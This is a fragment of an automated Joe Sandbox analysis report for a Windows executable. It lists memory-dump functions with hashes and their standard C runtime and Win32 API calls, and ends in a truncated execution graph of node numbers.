                                                                                                                                                                                                      • Opcode Fuzzy Hash: 047dd170d9da74deae2a54082c9d36e321ba8e479bfb212ec63d5f305555a14f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB312762B09682C5FE149B16A5623792741BF08FE4F544239DE2D877EEDE3CE489C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                      • Opcode ID: c1b0453fadfa5e8b22363265a7475aa739211c4a2fd6e5f190d4c8c9ac3e05fc
                                                                                                                                                                                                      • Instruction ID: 137d6db5424bd253b29497971a641c3d2dee2f7e2c1de19933a5c9ade3b87fcc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1b0453fadfa5e8b22363265a7475aa739211c4a2fd6e5f190d4c8c9ac3e05fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4631F561B09B82E5EE159B1AA51636CA351BF08FD4F140239DE5D8BBEDDE7CE085C300
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 9b4c77a211957641976add56281403e4dfe22f0d166586a5037c985053f08a19
                                                                                                                                                                                                      • Instruction ID: 42d2e243cf22dadaf9bb932bbc5008fb1c6b4e874163859cd261895a5604d56d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b4c77a211957641976add56281403e4dfe22f0d166586a5037c985053f08a19
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86514132608A91C6DB108F69E46136D7BA1FB88F94F64413AEA9D877A8DF7CD449C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                      • Opcode ID: 1c1b504eb94143577c8513432c5a5fd7cb917a007a8831c9cc37feba965cd2c2
                                                                                                                                                                                                      • Instruction ID: 8a8e61c641275e9a50d9b2cca943c54b0f30850c2b758c668c433ba212e1cb32
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c1b504eb94143577c8513432c5a5fd7cb917a007a8831c9cc37feba965cd2c2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4531F363B09782D4FA169B69A5523B82190AF08FF5F240239DE2D477EADE3C95C7C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C935C
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C9390
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C939A
                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C93C3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1775671525-0
                                                                                                                                                                                                      • Opcode ID: 64ce841dc1b1a1fed0fd60029dc663c1a30d68d1d24ca946da022716c2d9ee9e
                                                                                                                                                                                                      • Instruction ID: 3c3219ea715c1fb0475bc2e2fb24ae63fe039d5394af2312ad96fafd22d6f2c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64ce841dc1b1a1fed0fd60029dc663c1a30d68d1d24ca946da022716c2d9ee9e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6931B261B08A41D5EE119B1690162ADA351BF4CFD4F544639DA6D8BBFDDF7CE089C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2701), ref: 00007FF68B4C76FA
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF68B4B2701), ref: 00007FF68B4C7780
                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,00007FF68B4B2701), ref: 00007FF68B4C77A6
                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68B4C77CA
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4CAF74: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF68B4C9945,?,?,?,?,?,00007FF68B4C7EB5), ref: 00007FF68B4CAF8E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1155477157-0
                                                                                                                                                                                                      • Opcode ID: 91e93bb7e7692542c29157bc474df596a4174026cb6228c3b22891685a4c76cb
                                                                                                                                                                                                      • Instruction ID: 7ec08ab4dd8bca33ba581c7eeb730b2986b72af2ee6c1b1a99c9be6ca3c4915a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91e93bb7e7692542c29157bc474df596a4174026cb6228c3b22891685a4c76cb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5031C422A0A745C2EA149B51A4612792691BF08FF0F344B38DABE877E9DE3CF495C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$Concurrency::cancel_current_task
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 326894585-0
                                                                                                                                                                                                      • Opcode ID: b534d83fd82368a8ab6e12b163f43f4223bfc836c41a8890c4fe8090b5e846ca
                                                                                                                                                                                                      • Instruction ID: 9d11a71f11f7e52ad8556ecd9d438ff1d837e556dc4ef134544f9a7129e93528
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b534d83fd82368a8ab6e12b163f43f4223bfc836c41a8890c4fe8090b5e846ca
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9021C962A49745C5FB549B96A4423BC2260BF4CBE4F540A38DF7D877EADE7CA486C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 203985260-0
                                                                                                                                                                                                      • Opcode ID: 09bc2dd6ca67bac4e580aad1a412ba4f74ff657ac999759c6b0126dd9bfe66b3
                                                                                                                                                                                                      • Instruction ID: 765b8c4d74a1296aec7cdbfd6c5a29b948e2882060fe7a64e925c6a758a6ff7b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09bc2dd6ca67bac4e580aad1a412ba4f74ff657ac999759c6b0126dd9bfe66b3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0213872A18B95C6E3508F12A45432EB6A4FB8CF90F140138DB8893B68CF39D509CB00
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func__stdio_common_vfprintffclosefflushfree
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2759974054-0
                                                                                                                                                                                                      • Opcode ID: 00c634840845a2fbbd45c12de3c3f3df9139cd5f19dd2647e30005f7e89698d8
                                                                                                                                                                                                      • Instruction ID: 1e1841b45f9ede32924792c186792eb29a140058b8b2edadb170de85011bfdf3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00c634840845a2fbbd45c12de3c3f3df9139cd5f19dd2647e30005f7e89698d8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD212135509A82C1EB559F10D9962B863A5FF98F84F0D403ACA5DCB279EF3CA895D310
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF68B4B6BC5
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4CB9E8: MultiByteToWideChar.KERNEL32 ref: 00007FF68B4CBA04
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4CB9E8: GetLastError.KERNEL32 ref: 00007FF68B4CBA12
                                                                                                                                                                                                      • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF68B4B6C71
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C93D0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF68B4B7151), ref: 00007FF68B4C94D3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWidememcpy
                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                      • API String ID: 3269794198-410509341
                                                                                                                                                                                                      • Opcode ID: 296255065dc22a0ccfd8385624fc05b08794b71f588ef43bc7450ce4f62d15fa
                                                                                                                                                                                                      • Instruction ID: b5204022ce0bf938ec74d977061dd3cff2714fc63683445a4b163f7f2a3d200c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 296255065dc22a0ccfd8385624fc05b08794b71f588ef43bc7450ce4f62d15fa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B31F362A18B85C6EB149FA2950266D62A4FF48FC8F145039DF4D877A8DF3CE451C340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Xlength_error@std@@__std_exception_copy
                                                                                                                                                                                                      • String ID: string too long
                                                                                                                                                                                                      • API String ID: 127952674-2556327735
                                                                                                                                                                                                      • Opcode ID: 91b7703d8a468c46f029ff4c06fc218b4d9cb95b0ee727b000b25f8dab4d9274
                                                                                                                                                                                                      • Instruction ID: c40b0ad50d61385df2f3396615d1cb0241a5e6ac95a6ed3fabe53d664367e24a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91b7703d8a468c46f029ff4c06fc218b4d9cb95b0ee727b000b25f8dab4d9274
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33E03961A54A45D0EB118F61E8910A87370FF2CB54B888135C95D87338EF3CA1E9C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                      • Opcode ID: add347d4749a3fadeec7f98867147186dae86bebc7d49907be8afb496cbe6c9c
                                                                                                                                                                                                      • Instruction ID: d442ab5829d1c180ed165e2caf9e5f2b33728931cc203f5423bef8c83525b642
                                                                                                                                                                                                      • Opcode Fuzzy Hash: add347d4749a3fadeec7f98867147186dae86bebc7d49907be8afb496cbe6c9c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75B1A522A14B95C6E711DB35944527EB7A4FF9DB84F049336EE8993678EF38E482C700
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy$freemalloc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3313557100-0
                                                                                                                                                                                                      • Opcode ID: a03af4b64075eac189589463203c2f937ad66b6aadfc98da0266888738e420e2
                                                                                                                                                                                                      • Instruction ID: 2a87ce73e975b202abfbb0d6fd613921266338ce7e4ab6846ea110ca58eaf44c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a03af4b64075eac189589463203c2f937ad66b6aadfc98da0266888738e420e2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD31CC72A05A81C6EA14CF6AE6451A8A360FF4CF90B08843ADF5D87769DF3CE4A1C700

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:9.4%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:4%
                                                                                                                                                                                                      Total number of Nodes:1500
                                                                                                                                                                                                      Total number of Limit Nodes:43
                                                                                                                                                                                                      execution_graph 25491 151710 86 API calls 25492 16ad10 73 API calls 25443 16a400 GdipDisposeImage GdipFree 25444 16d600 70 API calls 25445 176000 QueryPerformanceFrequency QueryPerformanceCounter 25447 17f200 51 API calls 25495 172900 6 API calls 4 library calls 25497 17a700 21 API calls 25498 16f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25499 16ff30 LocalFree 24275 17bb30 24276 17bb42 24275->24276 24277 17bb39 24275->24277 24279 17ba27 24277->24279 24280 1797e5 _abort 38 API calls 24279->24280 24281 17ba34 24280->24281 24299 17bb4e 24281->24299 24283 17ba3c 24308 17b7bb 24283->24308 24288 17ba96 24291 178dcc _free 20 API calls 24288->24291 24293 17ba53 24291->24293 24292 17ba91 24332 1791a8 20 API calls _abort 24292->24332 24293->24276 24295 17bada 24295->24288 24333 17b691 26 API calls 24295->24333 24296 17baae 24296->24295 24297 178dcc _free 20 API calls 24296->24297 24297->24295 24300 17bb5a __FrameHandler3::FrameUnwindToState 24299->24300 24301 1797e5 _abort 38 API calls 24300->24301 24306 17bb64 24301->24306 24303 17bbe8 _abort 24303->24283 24306->24303 24307 178dcc _free 20 API calls 24306->24307 24334 178d24 38 API calls _abort 24306->24334 24335 17ac31 EnterCriticalSection 24306->24335 24336 17bbdf LeaveCriticalSection _abort 24306->24336 24307->24306 24309 174636 __fassign 38 API calls 24308->24309 24310 17b7cd 24309->24310 24311 17b7ee 24310->24311 24312 17b7dc GetOEMCP 24310->24312 24313 17b7f3 GetACP 24311->24313 24314 17b805 24311->24314 24312->24314 24313->24314 24314->24293 24315 178e06 24314->24315 24316 178e44 24315->24316 24320 178e14 _abort 24315->24320 24338 1791a8 20 API calls _abort 24316->24338 24317 178e2f RtlAllocateHeap 24319 178e42 24317->24319 24317->24320 24319->24288 24322 17bbf0 24319->24322 24320->24316 24320->24317 24337 177a5e 7 API calls 2 library calls 24320->24337 24323 17b7bb 40 API calls 24322->24323 24324 17bc0f 24323->24324 24327 17bc60 IsValidCodePage 24324->24327 24329 17bc16 24324->24329 24331 17bc85 __cftof 24324->24331 24325 16fbbc CatchGuardHandler 5 API calls 24326 17ba89 24325->24326 24326->24292 24326->24296 24328 17bc72 GetCPInfo 24327->24328 24327->24329 24328->24329 24328->24331 24329->24325 24339 17b893 GetCPInfo 24331->24339 24332->24288 24333->24288 24335->24306 24336->24306 24337->24320 24338->24319 24345 17b8cd 24339->24345 24348 17b977 24339->24348 24342 16fbbc CatchGuardHandler 5 API calls 24344 17ba23 24342->24344 24344->24329 24349 17c988 24345->24349 24347 17ab78 __vswprintf_c_l 43 API calls 24347->24348 24348->24342 24350 174636 __fassign 38 API calls 24349->24350 24351 17c9a8 MultiByteToWideChar 24350->24351 24353 17c9e6 24351->24353 24361 17ca7e 24351->24361 24355 178e06 __vswprintf_c_l 21 API calls 24353->24355 24359 17ca07 __cftof __vsnwprintf_l 24353->24359 24354 16fbbc CatchGuardHandler 5 API calls 24356 17b92e 24354->24356 24355->24359 24363 17ab78 24356->24363 24357 17ca78 24368 17abc3 20 API calls _free 24357->24368 24359->24357 24360 17ca4c MultiByteToWideChar 24359->24360 24360->24357 24362 17ca68 GetStringTypeW 24360->24362 24361->24354 24362->24357 24364 174636 __fassign 38 API calls 24363->24364 24365 17ab8b 24364->24365 24369 17a95b 24365->24369 24368->24361 24370 17a976 __vswprintf_c_l 24369->24370 24371 17a99c MultiByteToWideChar 24370->24371 24372 